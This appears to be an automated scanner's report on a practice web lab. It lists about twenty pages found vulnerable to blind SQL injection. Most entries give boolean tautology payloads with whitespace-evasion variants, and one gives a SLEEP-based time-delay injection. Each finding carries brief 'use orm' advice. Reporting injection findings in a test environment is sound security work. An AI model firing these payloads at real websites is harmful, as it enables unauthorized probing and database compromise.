Target: http://192.168.42.133 (GET)

---
URL:http://192.168.42.133/sqli/example1.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'43972'='43972
'	and	'6913'='6913
'	or	38407=38407#
'	and	'25357'='25358
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example2.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'43972'='43972
'	and	'6913'='6913
'	or	38407=38407#
'	and	'25357'='25358
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example4.php (GET)
VulnName: blind sqli
Query: {'id': '2'}
Payload: 	and	37531=37531
	and	33915=33915
	or	69342=69342#
	and	66271=66272
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example6.php (GET)
VulnName: blind sqli
Query: {'id': '2'}
Payload: 	and	37531=37531
	and	33915=33915
	or	69342=69342#
	and	66271=66272
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example5.php (GET)
VulnName: blind sqli
Query: {'id': '2'}
Payload: 	and	37531=37531
	and	33915=33915
	or	69342=69342#
	and	66271=66272
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example3.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '/**/and/**/'25513'='25513
'/**/and/**/'41318'='41318
'/**/or/**/40217=40217#
'/**/and/**/'93460'='93461
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example7.php (GET)
VulnName: blind sqli
Query: {'id': '2'}
Payload: 
and
34348=34348

and
51890=51890

or
19845=19845#

and
82828=82829
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/xml/example2.php (GET)
VulnName: blind sqli
Query: {'name': 'hacker'}
Payload: '+and+'91194'='91194
'+and+'46812'='46812
'+or+19402=19402#
'+and+'79997'='79998
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example100.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'43972'='43972
'	and	'6913'='6913
'	or	38407=38407#
'	and	'25357'='25358
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example101.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'43972'='43972
'	and	'6913'='6913
'	or	38407=38407#
'	and	'25357'='25358
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example102.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'43972'='43972
'	and	'6913'='6913
'	or	38407=38407#
'	and	'25357'='25358
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example103.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'43972'='43972
'	and	'6913'='6913
'	or	38407=38407#
'	and	'25357'='25358
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example104.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'43972'='43972
'	and	'6913'='6913
'	or	38407=38407#
'	and	'25357'='25358
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example105.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'43972'='43972
'	and	'6913'='6913
'	or	38407=38407#
'	and	'25357'='25358
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example106.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'43972'='43972
'	and	'6913'='6913
'	or	38407=38407#
'	and	'25357'='25358
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example107.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'43972'='43972
'	and	'6913'='6913
'	or	38407=38407#
'	and	'25357'='25358
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example108.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'43972'='43972
'	and	'6913'='6913
'	or	38407=38407#
'	and	'25357'='25358
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example110.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'43972'='43972
'	and	'6913'='6913
'	or	38407=38407#
'	and	'25357'='25358
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example109.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'43972'='43972
'	and	'6913'='6913
'	or	38407=38407#
'	and	'25357'='25358
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example111.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'43972'='43972
'	and	'6913'='6913
'	or	38407=38407#
'	and	'25357'='25358
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example8.php (GET)
VulnName: time delay sqli vuln
Query: {'order': 'name'}
Payload: ` or SLEEP(3);-- 
Advice: use orm
Database: unknown
---